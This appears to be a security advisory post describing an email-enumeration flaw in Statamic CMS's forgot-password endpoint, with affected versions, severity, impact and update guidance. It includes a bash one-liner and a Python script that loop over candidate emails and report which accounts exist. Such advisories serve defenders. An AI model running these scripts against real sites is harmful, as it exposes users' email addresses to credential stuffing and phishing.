Listen to this Post
The Statamic CMS forgot password endpoint previously responded with different messages or HTTP status codes depending on whether the submitted email address was registered. An unauthenticated attacker could send repeated POST requests to the password reset endpoint, each time providing a different email address. When the email belonged to an existing user, the system would respond with a success message or a different error code compared to a non-existent email. This behavioral discrepancy allowed attackers to build a list of valid user emails by automating the request submissions. The enumeration required only network access to the Statamic CMS instance and could be performed without any prior authentication. Valid user emails could then be used as an entry point for more targeted attacks, such as password brute forcing, credential stuffing, or phishing. The vulnerability existed because the application logic distinguished between “user not found” and “password reset email sent” states. By observing the timing, HTTP status, or text of the response, an attacker could infer account existence. This flaw is a classic user enumeration vulnerability often found in authentication‑related features. The issue affected all Statamic CMS versions lower than 5.73.21 and all versions from 6.0.0 up to but not including 6.15.0. The fix ensures that the endpoint returns identical generic responses for all requests, regardless of email validity. Developers patched the logic to remove any leaked existence information. The CVE was published on GitHub Advisory Database on April 28, 2026. The vulnerability has been given a moderate severity score due to its low complexity and network exploitability, but the lack of direct privilege escalation limits its criticality.
DailyCVE Form:
Platform: Statamic CMS
Version: <5.73.21, 6.0.0<6.15.0
Vulnerability: Email enumeration password reset
Severity: Moderate CVSS 5.3
date: 2026-04-28
Prediction: Patch date 2026-05-06
Analytics under heading What Undercode Say:
Bash one‑liner to enumerate valid users for email in $(cat emails.txt); do curl -s -X POST https://target.com/!/forgot-password \ -d "email=$email" | grep -q "reset link" && echo "Valid: $email" done
Python script for email enumeration
import requests
url = "https://target.com/!/forgot-password"
with open("emails.txt") as f:
for email in f:
r = requests.post(url, data={"email": email.strip()})
if "reset" in r.text:
print(f"[+] Valid email: {email.strip()}")
Exploit:
Unprivileged attacker sends crafted POST requests to the forgot‑password endpoint, analyzes response differences (HTTP status, response body length, or message text), and iterates over a list of candidate email addresses to confirm valid user accounts.
Protection from this CVE:
Update Statamic CMS to version 5.73.21 or 6.15.0 or later. If immediate update is impossible, implement generic error messages and disable response differentiation for failed password reset attempts; consider rate‑limiting the endpoint.
Impact:
Low‑complexity user enumeration leads to exposure of valid email addresses, facilitating subsequent credential‑based attacks such as password brute‑forcing, credential stuffing, and targeted phishing campaigns against known users.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
